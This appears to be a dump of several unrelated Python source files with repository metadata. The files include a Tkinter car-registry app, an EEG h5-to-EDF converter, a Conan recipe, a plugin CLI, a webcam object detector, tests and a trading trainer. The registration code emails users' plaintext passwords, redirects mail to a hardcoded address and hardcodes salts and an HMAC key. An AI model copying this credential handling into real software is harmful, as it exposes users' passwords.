command = self.registervalid, \
bg = self.newcolor).place(relx = .5, rely = .8, \
anchor = 'center')
def registervalid(self):
self.user = self.username.get()
self.em = self.emailname.get()
self.word = self.password.get()
self.cword = self.conpassword.get()
self.valid1 = self.valid2 = self.valid3 = self.valid4 = self.valid5 = True
if not self.user.split():
warninput = messagebox.showwarning('Warning', 'No input of username')
warning('No input of username.')
self.valid1 = False
if path.isfile(getcwd() + f'\\.account\\{self.user}.json'):
            infoinput = messagebox.showinfo('Info', f'Username \'{self.user}\' already exists')
            warning(f'Username \'{self.user}\' already exists.')
self.valid1 = False
if not self.em.split():
warninput = messagebox.showwarning('Warning', 'No input of email')
warning('No input of email.')
self.valid2 = False
if not self.word.split():
warninput = messagebox.showwarning('Warning', 'No input of password')
warning('No input of password.')
self.valid3 = False
if self.word != self.cword:
errorinput = messagebox.showerror('Error', 'Passwords are not the same')
error('Passwords are not the same.')
self.valid4 = False
if not self.valid1 or not self.valid2 or not self.valid3 or not self.valid4:
self.register()
else:
self.send_email()
def send_email(self):
msg = MIMEMultipart()
msg.attach(MIMEText(f'Dear {self.user}: \n\tYour Password is {self.word}.', 'plain', 'utf-8'))
sender = '<EMAIL>'
password = '<PASSWORD>'
receiver = self.em
receiver = '<EMAIL>' #HU<PASSWORD>
msg['From'] = sender
msg['To'] = receiver
msg['Subject'] = 'Confirm Password'
with open(getcwd() + '\\.config\\color.json', 'rb') as send_file:
att = MIMEText(send_file.read(), 'base64', 'utf-8')
att['Content-Type'] = 'application/octet-stream'
att['Content-Disposition'] = 'attachment;filename="color.json"'
msg.attach(att)
smtp_server = 'smtp.yeah.net'
server = SMTP(smtp_server, 25)
server.ehlo()
server.starttls()
server.login(sender, password)
server.set_debuglevel(False)
try:
server.sendmail(sender, receiver, msg.as_string())
except SMTPRecipientsRefused:
self.valid5 = False
msg['To'] = '<EMAIL>'
server.sendmail(sender, '<EMAIL>', msg.as_string())
server.quit()
if self.valid5:
            messagebox.showinfo('Successful', f'Successfully created account {self.user}')
            info(f'Successfully created account \'{self.user}\'.')
self.encrypt_register(self.word)
else:
            messagebox.showerror('Error', f'Email \'{self.em}\' is incorrect')
            error(f'Email \'{self.em}\' is incorrect.')
self.register()
def encrypt_register(self, password):
encrypted_password = Vigenere().encipher(password, '<PASSWORD>')
onepass = sha512(b'2<PASSWORD>asdfwerxdf34sdfsdfs90')
onepass.update(encrypted_password.encode())
        self.signp = b'GQnIdFUUAUDlcepuaDVGJpnmfRektPLT'
        sign = new(self.signp, onepass.hexdigest().encode('utf-8'), \
                   digestmod = sha224).hexdigest()
Account(f'{self.user}.json').createfile([onepass.hexdigest(), 'fdfskfg', sign])
def login(self):
self.logintop = Toplevel(bg = self.newcolor)
self.logintop.title('Login')
self.logintop.resizable(0, 0)
alignstr = f'250x75+{(self.screenwidth - 750) // 2}+{(self.screenheight - 600) // 2 - 50}'
self.logintop.geometry(alignstr)
self.logintop.iconbitmap('.\\.image\\car.ico')
label1 = Label(self.logintop, text = 'User Name', \
bg = self.newcolor).place(relx = .025, rely = .07)
self.username = Entry(self.logintop, bg = self.newcolor)
self.username.place(relx = .45, rely = .08)
label2 = Label(self.logintop, text = 'Password', \
bg = self.newcolor).place(relx = .025, rely = .34)
self.password = Entry(self.logintop, bg = self.newcolor, show = '*')
self.password.place(relx = .45, rely = .35)
button = Button(self.logintop, text = 'Login', command = self.loginvalid, \
bg = self.newcolor).place(relx = .5, rely = .8, \
anchor = 'center')
def loginvalid(self):
self.userget = self.username.get()
self.valid = True
if not path.isfile(getcwd() + f'\\.account\\{self.userget}.json'):
            infoinput = messagebox.showinfo('Info', f'Username \'{self.userget}\' does not exist')
            warning(f'Username \'{self.userget}\' does not exist.')
self.valid = False
self.login()
else:
self.decrypt_login(self.password.get())
def decrypt_login(self, password):
        loadaccount = Account(f'{self.userget}.json').loadfile()
        dsign = new(self.signp, loadaccount[0].encode('utf-8'), digestmod = sha224).hexdigest()
        # Compare the recomputed HMAC of the stored digest with the signature saved at registration.
        print(compare_digest(loadaccount[2], dsign))
def popup(self, event):
self.rmenu.post(event.x_root, event.y_root)
def color(self):
self.newcolor = colorchooser.askcolor(self.newcolor, title = 'Choose a color')[1]
if self.newcolor:
Config('color.json').createfile(self.newcolor)
info(f'Edited color config: {self.newcolor}.')
self.root.destroy()
self.__init__()
def create_car(self):
self.get_manufacturer = self.manufacturer.get()
self.get_name = self.name.get()
self.get_year = self.year.get()
if self.rint.get():
self.new_car = ElectricCar(self.get_manufacturer, self.get_name, \
self.get_year)
self.new_car_name = self.new_car.get_descriptive_name()
else:
self.new_car = Car(self.get_manufacturer, self.get_name, self.get_year)
self.new_car_name = self.new_car.get_descriptive_name()
self.valid1 = False
self.valid2 = False
self.valid3 = False
if self.get_manufacturer:
try:
self.get_manufacturer = int(self.get_manufacturer)
except:
pass
if isinstance(self.get_manufacturer, str):
self.valid1 = True
else:
warntype = messagebox.showerror('Error', f'Invalid Type \'{type(self.get_manufacturer).__name__}\' of manufacturer')
error(f'Invalid Type \'{type(self.get_manufacturer).__name__}\' of manufacturer.')
else:
warninput = messagebox.showwarning('Warning', 'No input of manufacturer')
warning('No input of manufacturer.')
if self.get_name:
try:
self.get_name = int(self.get_name)
except:
pass
if isinstance(self.get_name, str):
self.valid2 = True
else:
warntype = messagebox.showerror('Error', f'Invalid Type \'{type(self.get_name).__name__}\' of name')
error(f'Invalid Type \'{type(self.get_name).__name__}\' of name.')
else:
warninput = messagebox.showwarning('Warning', 'No input of name')
warning('No input of name.')
if self.get_year:
try:
self.get_year = int(self.get_year)
except:
warntype = messagebox.showerror('Error', f'Invalid Type \'{type(self.get_year).__name__}\' of year')
error(f'Invalid Type \'{type(self.get_year).__name__}\' of year.')
if isinstance(self.get_year, int):
self.valid3 = True
else:
warninput = messagebox.showwarning('Warning', 'No input of year')
warning('No input of year.')
        ele = 'electric car' if self.rint.get() else 'car'
if self.valid1 and self.valid2 and self.valid3:
self.confirm = messagebox.askyesno('Confirm', f'Create new {ele}: \n{self.new_car_name}')
if self.confirm:
Config('cars.json').createfile({'Name': self.new_car_name, \
'Type': ele.title()}, True)
                messagebox.showinfo('Successful', f'Successfully created {ele} \'{self.new_car_name}\'')
                info(f'Successfully created {ele} \'{self.new_car_name}\'.')
else:
self.create_car_gui()
def set_battery_gui(self):
self.batterytop = Toplevel(bg = self.newcolor)
self.batterytop.title('Set Battery -kWh')
self.batterytop.resizable(0, 0)
alignstr = f'250x100+{(self.screenwidth - 750) // 2}+{(self.screenheight - 600) // 2 - 50}'
self.batterytop.geometry(alignstr)
self.batterytop.iconbitmap('.\\.image\\car.ico')
        self.battery_button1 = Radiobutton(self.batterytop, text = '60 -kWh', \
                                           variable = self.rint, bg = self.newcolor, \
                                           value = 0, indicatoron = False).pack()
def create_car_gui(self):
self.cartop = Toplevel(bg = self.newcolor)
self.cartop.title('Create Car')
self.cartop.resizable(0, 0)
alignstr = f'250x200+{(self.screenwidth - 750) // 2}+{(self.screenheight - 600) // 2 - 50}'
self.cartop.geometry(alignstr)
self.cartop.iconbitmap('.\\.image\\car.ico')
self.radiobutton1 = Radiobutton(self.cartop, text = 'Car', variable = self.rint, \
bg = self.newcolor, value = 0).pack()
        self.radiobutton2 = Radiobutton(self.cartop, text = 'Electric Car', variable = self.rint, \
bg = self.newcolor, value = 1).pack()
label1 = Label(self.cartop, text = 'Car Manufacturer: (Str)', \
bg = self.newcolor).pack()
self.manufacturer = Entry(self.cartop, bg = self.newcolor)
self.manufacturer.pack()
label2 = Label(self.cartop, text = 'Car Name: (Str)', \
bg = self.newcolor).pack()
self.name = Entry(self.cartop, bg = self.newcolor)
self.name.pack()
label3 = Label(self.cartop, text = 'Year: (Int)', \
bg = self.newcolor).pack()
self.year = Spinbox(self.cartop, from_ = localtime()[0] - 15, \
to = localtime()[0] + 1, bg = self.newcolor)
self.year.pack()
button = Button(self.cartop, text = 'Create', command = self.create_car, \
bg = self.newcolor).pack()
def rquit(self):
self.root.destroy()
def CreateFolder(pathcwd):
if not path.exists(getcwd() + '\\%s' % pathcwd):
mkdir(getcwd() + '\\%s' % pathcwd)
def CreateLogFile():
CreateFolder('.log')
basicConfig(format = '%(asctime)s %(levelname)s: %(message)s', \
datefmt = '%Y-%m-%d %H:%M:%S', filename = getcwd() + \
'\\.log\\logs.log', filemode = 'a', level = DEBUG)
class Config():
def __init__(self, filename):
CreateFolder('.config')
self.filename = filename
def createfile(self, msg, ifadd = False):
configfolder = getcwd() + '\\.config\\%s' % self.filename
if ifadd:
with open(configfolder, mode = 'a') as file:
dump(msg, file)
return
with open(configfolder, mode = 'w+') as file:
dump(msg, file)
return
def loadfile(self):
configfolder = getcwd() + '\\.config\\%s' % self.filename
with open(configfolder, mode = 'r') as file:
self.fileinfo = load(file)
return self.fileinfo
class Account():
def __init__(self, filename):
CreateFolder('.account')
self.filename = filename
def createfile(self, msg):
configfolder = getcwd() + '\\.account\\%s' % self.filename
with open(configfolder, mode = 'w+') as file:
dump(msg, file)
return
def loadfile(self):
configfolder = getcwd() + '\\.account\\%s' % self.filename
with open(configfolder, mode = 'r') as file:
self.fileinfo = load(file)
return self.fileinfo
class Car():
def __init__(self, make, model, year):
CreateLogFile()
self.make = make
self.model = model
self.year = year
self.odometer_reading = 0
def get_descriptive_name(self):
self.descriptive = f'{str(self.year)} {self.make} {self.model}'.title()
info(f'Getting car name: {self.descriptive}')
return self.descriptive
def descriptive_name(self):
return f'{str(self.year)} {self.make} {self.model}'.title()
def update_odometer(self, mileage):
if mileage >= self.odometer_reading:
self.odometer_reading = mileage
else:
warning('Rolling back an odometer.')
def read_odometer(self):
return f'This car has {str(self.odometer_reading)} miles on it.'
def get_odometer(self):
info(f'Getting odometer: {self.odometer_reading}')
return self.odometer_reading
def increment_odometer(self, miles):
self.odometer_reading += miles
class ElectricCar(Car):
def __init__(self, make, model, year):
super().__init__(make, model, year)
self.battery = Battery(85)
class Battery():
def __init__(self, battery_size = 60):
self.battery_size = battery_size
def describe_battery(self):
return f'This car has a {str(self.battery_size)} -kWh battery.'
def get_range(self):
if self.battery_size == 60:
range = 340
elif self.battery_size == 85:
range = 685
return f'This car can go approximately {str(range)} miles on a full charge.'
class Mainloop():
CreateLogFile()
info('Opened GUI application.')
GUI()
Audi_Q5 = Car('Audi', 'Q5', 2018)
print(Audi_Q5.get_descriptive_name())
Audi_Q5.update_odometer(7884)
print(Audi_Q5.read_odometer())
print()
Tesla_Model3 = ElectricCar('Tesla', 'Model 3', 2020)
print(Tesla_Model3.get_descriptive_name())
Tesla_Model3.update_odometer(397)
print(Tesla_Model3.read_odometer())
print(Tesla_Model3.battery.describe_battery())
print(Tesla_Model3.battery.get_range())
descriptive_dict = {'Name': Audi_Q5.descriptive_name(), \
'Odometer': Audi_Q5.get_odometer()}
print(descriptive_dict)
Config('test.json').createfile(descriptive_dict)
Mainloop()
| 2.546875
| 3
|
convert_data_to_edf.py
|
Dreem-Organization/dreem-learning-open
| 44
|
12777982
|
import os
import pyedflib
import h5py
import pytz
import datetime as dt
import struct
psg_properties = {'digital_max': [32767],
'digital_min': [-32767],
'dimension': ['uV'],
'physical_min': [-800.0],
'physical_max': [800.0],
'prefilter': [''],
'sample_rate': [250],
"transducer": [""]}
def convert_h5_to_edf(h5_path, output_file="psg.edf", psg_properties=psg_properties):
    h5 = h5py.File(h5_path, "r")
    # Collect every EEG/EMG/EOG channel path present in the h5 recording.
    subfolders = ['signals/eeg', 'signals/emg', 'signals/eog']
psg_labels = []
for subfolder in subfolders:
psg_labels.extend([f"{subfolder}/{x}" for x in list(h5[subfolder].keys())])
try:
start_time = pytz.timezone('UTC').localize(
dt.datetime.utcfromtimestamp(h5.attrs["start_time"])
)
except KeyError:
start_time = pytz.timezone('UTC').localize(
dt.datetime.utcfromtimestamp(0)
)
number_of_data_records = int(len(h5[psg_labels[0]]) / 250)
duration = 1
header = (
"0".ljust(8)
+ "".ljust(80)
+ "".ljust(80)
+ start_time.strftime("%d.%m.%y%H.%M.%S")
+ str((len(psg_labels) + 1) * 256).ljust(8)
+ "".ljust(44)
+ str(number_of_data_records).ljust(8)
+ str(duration).ljust(8)
+ str(len(psg_labels)).ljust(4)
)
subheaders = (
"".join([str(x.split('/')[-1]).ljust(16) for x in psg_labels])
+ "".join([str(x).ljust(80) for x in psg_properties['transducer'] * len(psg_labels)])
+ "".join([str(x).ljust(8) for x in psg_properties['dimension'] * len(psg_labels)])
+ "".join([str(x).ljust(8) for x in psg_properties['physical_min'] * len(psg_labels)])
+ "".join([str(x).ljust(8) for x in psg_properties['physical_max'] * len(psg_labels)])
+ "".join([str(x).ljust(8) for x in psg_properties['digital_min'] * len(psg_labels)])
+ "".join([str(x).ljust(8) for x in psg_properties['digital_max'] * len(psg_labels)])
+ "".join([str(x).ljust(80) for x in psg_properties['prefilter'] * len(psg_labels)])
+ "".join([str(x).ljust(8) for x in psg_properties['sample_rate'] * len(psg_labels)])
+ "".ljust(32) * len(psg_labels)
)
edf_path = output_file
with open(edf_path, "wb") as f:
f.write(bytes(header, "UTF-8"))
f.write(bytes(subheaders, "UTF-8"))
def transform(x, min, max):
if max < min:
min, max = max, min
x = x.clip(min, max)
return (((x - min) / (max - min)) * (2 ** 16 - 1) - (2 ** 15)).astype(int)
data_transformed = []
for i, data_path in enumerate(psg_labels):
data_transformed += [transform(h5[data_path][:], psg_properties['physical_min'][0], psg_properties['physical_max'][0])]
for i in range(number_of_data_records):
data = []
for k, signal_transformed in enumerate(data_transformed):
data += list(signal_transformed[i * int(psg_properties['sample_rate'][0]): int(psg_properties['sample_rate'][0] * (i + 1))])
data_to_write = struct.pack("h" * len(data), *data)
f.write(data_to_write)
return edf_path
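# Editor's note: a minimal, illustrative invocation of the converter above.
# The input path is hypothetical; the guard keeps the module importable.
if __name__ == "__main__":
    example_record = "record.h5"  # hypothetical Dreem h5 recording
    print(convert_h5_to_edf(example_record, output_file="psg.edf"))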
| 2
| 2
|
conanfile.py
|
mohamedghita/conan-fcl
| 0
|
12777983
|
<reponame>mohamedghita/conan-fcl
from conans import ConanFile, CMake, tools
import shutil
import os.path
class FclConan(ConanFile):
name = "fcl"
version = "0.5.0"
license = "BSD"
author = "<NAME> (<EMAIL>)"
url = "https://github.com/mohamedghita/conan-fcl"
description = "conan.io package for flexible-collision-library/fcl https://github.com/flexible-collision-library/fcl"
topics = ("fcl", "collision")
settings = "os", "compiler", "build_type", "arch"
options = {
"shared": [True, False],
"build_tests": [True, False]
}
default_options = {
"shared": True,
"build_tests": False
}
requires = "eigen/3.3.7@conan/stable", "libccd/2.1@radalytica/stable"
build_requires = "cmake_installer/[>=3.14.4]@conan/stable", "pkg-config_installer/0.29.2@bincrafters/stable"
generators = "cmake"
def source(self):
extension = ".zip" if tools.os_info.is_windows else ".tar.gz"
url = "https://github.com/flexible-collision-library/fcl/archive/%s%s" % (self.version, extension)
tools.get(url)
shutil.move("fcl-%s" % self.version, "fcl")
tools.replace_in_file("fcl/CMakeLists.txt", "project(fcl CXX C)",
'project(fcl CXX C)\n' +
'include(${CMAKE_BINARY_DIR}/conanbuildinfo.cmake)\n' +
'conan_basic_setup()\n')
#if self.settings.compiler.cppstd == "17":
tools.replace_in_file("fcl/include/fcl/math/math_details.h", "register", " ")
def _fcl_cmake_definitions(self, package_folder, build_folder):
# CCD_LIBRARY_DIRS
cmake_defs = {}
cmake_defs["CCD_INCLUDE_DIRS"] = self.deps_cpp_info["libccd"].includedirs
cmake_defs["CCD_LIBRARY_DIRS"] = self.deps_cpp_info["libccd"].libdirs
cmake_defs["FCL_BUILD_TESTS"] = 'ON' if self.options.build_tests else 'OFF'
cmake_defs["FCL_STATIC_LIBRARY"] = 'OFF' if self.options.shared else 'ON'
if build_folder:
cmake_defs['EXECUTABLE_OUTPUT_PATH'] = os.path.join(build_folder, "bin") # points to testing executables. testing is executed during conan build
if package_folder:
cmake_defs["CMAKE_INSTALL_PREFIX"] = package_folder
return cmake_defs
def _configure_cmake(self, package_folder=None, build_folder=None):
WARNING_FLAGS = '' # '-Wall -Wextra -Wnon-virtual-dtor -pedantic -Wshadow'
if self.settings.build_type == "Debug":
# debug flags
cppDefines = '-DDEBUG'
cFlags = '-g' + ' ' + WARNING_FLAGS
cxxFlags = cFlags + ' ' + cppDefines
linkFlags = ''
else:
# release flags
cppDefines = '-DNDEBUG'
cFlags = '-v -O3 -s' + ' ' + WARNING_FLAGS
cxxFlags = cFlags + ' ' + cppDefines
linkFlags = '-s' # Strip symbols
cmake = CMake(self)
cmake.verbose = False
# put definitions here so that they are re-used in cmake between
# build() and package()
cmake.definitions["CONAN_C_FLAGS"] += ' ' + cFlags
cmake.definitions["CONAN_CXX_FLAGS"] += ' ' + cxxFlags
cmake.definitions["CONAN_SHARED_LINKER_FLAGS"] += ' ' + linkFlags
cmake_defs = self._fcl_cmake_definitions(package_folder, build_folder)
cmake_defs["CMAKE_POSITION_INDEPENDENT_CODE"] = "ON"
cmake.configure(defs=cmake_defs, source_folder=os.path.join(self.build_folder, "fcl"))
return cmake
def build(self):
vars = {'PKG_CONFIG_PATH': os.path.join(self.deps_cpp_info["libccd"].rootpath, 'lib', 'pkgconfig')}
with tools.environment_append(vars):
cmake = self._configure_cmake(build_folder=self.build_folder)
cmake.build()
if self.options.build_tests:
cmake.test()
def package(self):
cmake = self._configure_cmake(package_folder=self.package_folder)
cmake.install()
def package_info(self):
self.cpp_info.includedirs = ['include'] # Ordered list of include paths
self.cpp_info.libs = [self.name] # The libs to link against
self.cpp_info.libdirs = ['lib'] # Directories where libraries can be found
| 1.742188
| 2
|
opskitcl.py
|
surfkansas/opskit
| 0
|
12777984
|
<gh_stars>0
import argparse
import importlib
import os
import sys
def build_arg_parser():
arg_parser = argparse.ArgumentParser(add_help=False)
arg_parser.add_argument('product', nargs='?', default=None)
arg_parser.add_argument('action', nargs='?', default=None)
arg_parser.add_argument('--help', action='store_true')
return arg_parser
def show_help(args, arg_parser):
if args.product is None:
print()
print('usage: opskit <product> <action> [--help] [[action args]]')
print()
return
else:
module_name = 'opskit_{0}'.format(args.product.replace('-', '_'))
try:
module_instance = importlib.import_module(module_name)
module_path = module_instance.__path__[0]
help_name = 'help.txt'
if args.action is not None:
help_name = 'help_{0}.txt'.format(args.action.replace('-', '_'))
help_path = os.path.join(module_path, help_name)
with open(help_path, 'r') as help_file:
print()
print(help_file.read())
print()
except:
print()
if args.action is not None:
print('Unable to show help for module: {0}, action: {1}'.format(module_name, args.action))
else:
print('Unable to show help for module: {0}'.format(module_name))
print()
def run_action(args):
module_name = 'opskit_{0}'.format(args.product.replace('-', '_'))
module_instance = importlib.import_module(module_name)
class_instance = getattr(module_instance, args.action.replace('-', '_'))
action_instance = class_instance()
action_instance.initialize(build_arg_parser())
action_instance.run_action()
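# Editor's sketch: the loader above appears to assume plugin packages named
# ``opskit_<product>`` that expose one class per action (class name == action
# with dashes mapped to underscores), plus help.txt / help_<action>.txt files
# read by show_help(). A hypothetical minimal plugin, shown as a comment only:
#
#     # opskit_example/__init__.py  (illustrative name, not part of this repo)
#     class hello:
#         def initialize(self, arg_parser):
#             self.args, _ = arg_parser.parse_known_args()
#
#         def run_action(self):
#             print('hello from the example plugin')
#
# which the CLI would then dispatch via ``opskit example hello``.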
def main():
sys.path.append('.')
arg_parser = build_arg_parser()
args, unknown = arg_parser.parse_known_args()
if args.help or args.product is None or args.action is None:
show_help(args, arg_parser)
else:
run_action(args)
if __name__ == '__main__':
main()
| 2.765625
| 3
|
rt_od_force.py
|
Cybernorse/credit-card-owner-verification-and-indoor-security-system-with-face-recognition-and-object-detection
| 0
|
12777985
|
import cv2
import numpy as np
import os
# import six.moves.urllib as urllib
import sys
import tarfile
import tensorflow as tf
import zipfile
import pathlib
from collections import defaultdict
from io import StringIO
from matplotlib import pyplot as plt
from PIL import Image
from IPython.display import display
from object_detection.utils import ops as utils_ops
from object_detection.utils import label_map_util
from object_detection.utils import visualization_utils as vis_util
def load_model(model_name):
model = tf.saved_model.load(
'/home/bigpenguin/code/fyp_codes/eff_d0/research/object_detection/inference_graph2/saved_model/')
return model
PATH_TO_LABELS = '/home/bigpenguin/code/fyp_codes/eff_d0/research/object_detection/inference_graph2/labelmap.pbtxt'
category_index = label_map_util.create_category_index_from_labelmap(
PATH_TO_LABELS, use_display_name=True)
model_name = 'saved_model.pb'
detection_model = load_model(model_name)
def run_inference_for_single_image(model, image):
image = np.asarray(image)
# The input needs to be a tensor, convert it using `tf.convert_to_tensor`.
input_tensor = tf.convert_to_tensor(image)
# The model expects a batch of images, so add an axis with `tf.newaxis`.
input_tensor = input_tensor[tf.newaxis, ...]
# Run inference
model_fn = model.signatures['serving_default']
output_dict = model_fn(input_tensor)
    # All outputs are batch tensors.
# Convert to numpy arrays, and take index [0] to remove the batch dimension.
# We're only interested in the first num_detections.
num_detections = int(output_dict.pop('num_detections'))
output_dict = {key: value[0, :num_detections].numpy()
for key, value in output_dict.items()}
output_dict['num_detections'] = num_detections
# detection_classes should be ints.
output_dict['detection_classes'] = output_dict['detection_classes'].astype(
np.int64)
# Handle models with masks:
if 'detection_masks' in output_dict:
        # Reframe the bbox mask to the image size.
detection_masks_reframed = utils_ops.reframe_box_masks_to_image_masks(
output_dict['detection_masks'], output_dict['detection_boxes'],
image.shape[0], image.shape[1])
detection_masks_reframed = tf.cast(detection_masks_reframed > 0.5,
tf.uint8)
output_dict['detection_masks_reframed'] = detection_masks_reframed.numpy()
return output_dict
def show_inference(model, frame):
# take the frame from webcam feed and convert that to array
image_np = np.array(frame)
# Actual detection.
output_dict = run_inference_for_single_image(model, image_np)
# Visualization of the results of a detection.
vis_util.visualize_boxes_and_labels_on_image_array(
image_np,
output_dict['detection_boxes'],
output_dict['detection_classes'],
output_dict['detection_scores'],
category_index,
instance_masks=output_dict.get('detection_masks_reframed', None),
use_normalized_coordinates=True,
line_thickness=2)
return(image_np)
video_capture = cv2.VideoCapture(0)
while True:
# Capture frame-by-frame
re, frame = video_capture.read()
Imagenp = show_inference(detection_model, frame)
cv2.imshow('object detection', Imagenp)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
video_capture.release()
cv2.destroyAllWindows()
# cv2.resize(Imagenp, (800,600)
| 2.421875
| 2
|
tests/test_pyres_tasks.py
|
gingerlime/remotecv
| 1
|
12777986
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import mock
from preggy import expect
from unittest import TestCase
from tests import read_fixture
from remotecv.pyres_tasks import DetectTask
from remotecv.utils import config
class DetectTaskTestCase(TestCase):
def test_should_run_detector_task(self):
store_mock = mock.Mock()
config.loader = mock.Mock(load_sync=read_fixture)
config.store = store_mock
config.store.ResultStore = mock.Mock(return_value=store_mock)
DetectTask.perform('all', 'multiple_faces_bw.jpg', 'test-key')
call = store_mock.store.call_args[0]
expect(call[0]).to_equal('test-key')
expect(call[1]).to_be_greater_than(20)
expect(call[1][0][0]).to_be_numeric()
expect(call[1][0][1]).to_be_numeric()
expect(call[1][0][2]).to_be_numeric()
expect(call[1][0][3]).to_be_numeric()
| 2.25
| 2
|
Python/2_square(n)_sum.py
|
josefrank/codewars
| 0
|
12777987
|
<gh_stars>0
"""
Complete the square sum function so that it squares each number passed
into it and then sums the results together.
For example, for [1, 2, 2] it should return 9 because 1^2 + 2^2 + 2^2 = 9
"""
# Solution
def square_sum(numbers):
    # Simple function that uses a for loop and iterates over a list.
    total = 0
    for number in numbers:
        total += number ** 2
    return total
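# Editor's note: a small illustrative check of the solution above.
if __name__ == "__main__":
    assert square_sum([1, 2, 2]) == 9   # 1^2 + 2^2 + 2^2
    assert square_sum([]) == 0
    print("square_sum examples passed")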
| 4.0625
| 4
|
src/training_managers/evolutionary_computation_trainer.py
|
Freitacr/ML-StockAnalysisProject
| 0
|
12777988
|
"""
"""
from configparser import ConfigParser, SectionProxy
from os import path
import os
from typing import List, Tuple, Any, Optional, Dict
import numpy as np
import tqdm
from general_utils.config import config_util, config_parser_singleton
from general_utils.exportation import csv_exportation
from general_utils.logging import logger
from data_providing_module import configurable_registry, data_provider_registry
from data_providing_module.data_providers import data_provider_static_names
from stock_data_analysis_module.ml_models.evolutionary_computation import TradingPopulation
CONSUMER_ID = "Evolutionary Computation Trainer"
_ENABLED_CONFIGURATION_IDENTIFIER = 'enabled'
_EXAMPLE_COMBINATION_FACTOR_IDENTIFIER = 'Periods Per Example'
_TDP_BLOCK_LENGTH_IDENTIFIER = "trend deterministic data provider block length"
_NUM_EPOCHS_IDENTIFIER = "Number of Epochs"
_NUM_INDIVIDUALS_IDENTIFIER = "Number of Individuals in Evolutionary Population"
_MODEL_CHECKPOINT_EPOCH_INTERVAL_IDENTIFIER = "Model Saving Epoch Interval"
_TRAINING_PERIODS_PER_EXAMPLE_IDENTIFIER = "Days Per Example"
_MUTATION_CHANCE_IDENTIFIER = "Mutation Chance Per Genome"
_MUTATION_MAGNITUDE_IDENTIFIER = "Mutation Magnitude"
_CROSSOVER_CHANCE_IDENTIFIER = "Crossover Chance Per Genome"
_CONFIGURABLE_IDENTIFIERS = [_ENABLED_CONFIGURATION_IDENTIFIER, _EXAMPLE_COMBINATION_FACTOR_IDENTIFIER,
_TDP_BLOCK_LENGTH_IDENTIFIER, _NUM_EPOCHS_IDENTIFIER, _NUM_INDIVIDUALS_IDENTIFIER,
_MODEL_CHECKPOINT_EPOCH_INTERVAL_IDENTIFIER, _TRAINING_PERIODS_PER_EXAMPLE_IDENTIFIER,
_MUTATION_CHANCE_IDENTIFIER, _MUTATION_MAGNITUDE_IDENTIFIER, _CROSSOVER_CHANCE_IDENTIFIER]
_CONFIGURATION_DEFAULTS = ['False', '22', '2520', '100', '100', '5', '5', '.1', '.15', '.5']
def string_serialize_predictions(predictions) -> str:
ret_str = ""
ticker_prediction_template = "{}:{}\n"
individual_prediction_template = "{}:\n\t\tBuy: {}\n\t\tSell: {}\n\t\tAccuracies: {:.2f}, {:.2f}"
for ticker, data in predictions.items():
ticker_predictions, accuracies = data
serialized_individual_predictions = []
for i in range(len(ticker_predictions)):
indicate_buy = ticker_predictions[i][0] == 1
indicate_sell = ticker_predictions[i][1] == 1
serialized_individual_predictions.append(
individual_prediction_template.format(i+1, indicate_buy, indicate_sell,
accuracies[i][0], accuracies[i][1])
)
expanded_template = ticker_prediction_template.format(ticker, "\n\t{}" * len(ticker_predictions))
ret_str += expanded_template.format(*serialized_individual_predictions)
return ret_str
def export_predictions(predictions, output_dir) -> None:
out_file = output_dir + path.sep + "ec.csv"
exportation_columns = []
for ticker, prediction_data in predictions.items():
actual_predictions, observed_accuracies = prediction_data
actual_predictions = np.where(actual_predictions == 1, True, False)
exportation_columns.append((ticker, "", ""))
for i in range(len(actual_predictions)):
exportation_columns.append((",Model:", str(i)))
exportation_columns.append((",Buy:", str(actual_predictions[i][0])))
exportation_columns.append((",Buy Accuracy:", str(observed_accuracies[i][0])))
exportation_columns.append((",Sell:", str(actual_predictions[i][1])))
exportation_columns.append((",Sell Accuracy:", str(observed_accuracies[i][1])))
with open(out_file, 'w') as handle:
for column in exportation_columns:
handle.write(",".join(column) + '\n')
def prediction_truth_calculation(predictions: List[np.ndarray],
closing_prices: List[float],
num_days_per_prediction: int = 5):
prediction_entry = Tuple[List[np.ndarray], float, List[List[bool]]]
prediction_array: List[Optional[prediction_entry]] = [None] * (num_days_per_prediction+1)
current_index = 0
ret = []
for i in range(len(predictions)):
for j in range(1, len(prediction_array)):
index = (j + current_index) % len(prediction_array)
if prediction_array[index] is None:
continue
for k in range(len(prediction_array[index][0])):
prediction, reference_price, prediction_truths = prediction_array[index]
prediction = prediction[k]
prediction_truths = prediction_truths[k]
if reference_price < closing_prices[i]:
if prediction[0]:
prediction_truths[0] = True
if not prediction[1]:
prediction_truths[1] = True
elif reference_price > closing_prices[i]:
if not prediction[0]:
prediction_truths[0] = True
if prediction[1]:
prediction_truths[1] = True
if prediction_array[current_index] is not None:
prediction_truth = prediction_array[current_index][-1]
ret.append(prediction_truth)
        # Use independent truth-flag lists per model so updates do not alias each other.
        prediction_array[current_index] = ([*predictions[i]], closing_prices[i],
                                           [[False, False] for _ in range(len(predictions[i]))])
current_index += 1
current_index %= len(prediction_array)
return ret
def extract_accuracy_from_prediction_truths(prediction_truths: List[List[List[bool]]]):
ret = np.zeros((len(prediction_truths[0]), len(prediction_truths[0][0])))
for i in range(len(prediction_truths)):
for prediction_index, truths in enumerate(prediction_truths[i]):
for index, truth in enumerate(truths):
if truth:
ret[prediction_index][index] += 1
ret /= len(prediction_truths)
return ret
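# Editor's sketch (never called): how the two helpers above combine. Two
# timesteps of (buy, sell) truth flags for a single model reduce to per-flag
# hit rates; the values are illustrative only.
def _example_accuracy_extraction():
    truths = [
        [[True, False]],   # timestep 1: buy flag correct, sell flag not
        [[True, True]],    # timestep 2: both flags correct
    ]
    return extract_accuracy_from_prediction_truths(truths)  # -> array([[1. , 0.5]])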
class EvolutionaryComputationManager(data_provider_registry.DataConsumerBase):
def __init__(self):
super().__init__()
configurable_registry.config_registry.register_configurable(self)
self.__contained_population: Optional[TradingPopulation] = None
self.__periods_per_example = 5
self.__num_epochs = 100
self.__num_individuals = 100
self.__save_interval = 5
self.__mutation_chance = .1
self.__mutation_magnitude = .15
self.__crossover_chance = .5
def consume_data(self, data: Dict[str, Tuple[np.ndarray, List[float]]], passback, output_dir):
out_dir = output_dir + path.sep + 'evolutionary_computation_models'
if not path.exists(out_dir):
os.mkdir(out_dir)
previous_model_file = out_dir + path.sep + "evolution_individuals.ecp"
if path.exists(previous_model_file):
self.__contained_population = TradingPopulation((0, 0), 0, 0)
self.__contained_population.load(previous_model_file)
else:
num_indicators = len(data[next(iter(data.keys()))][0])
input_shape = (num_indicators, self.__periods_per_example)
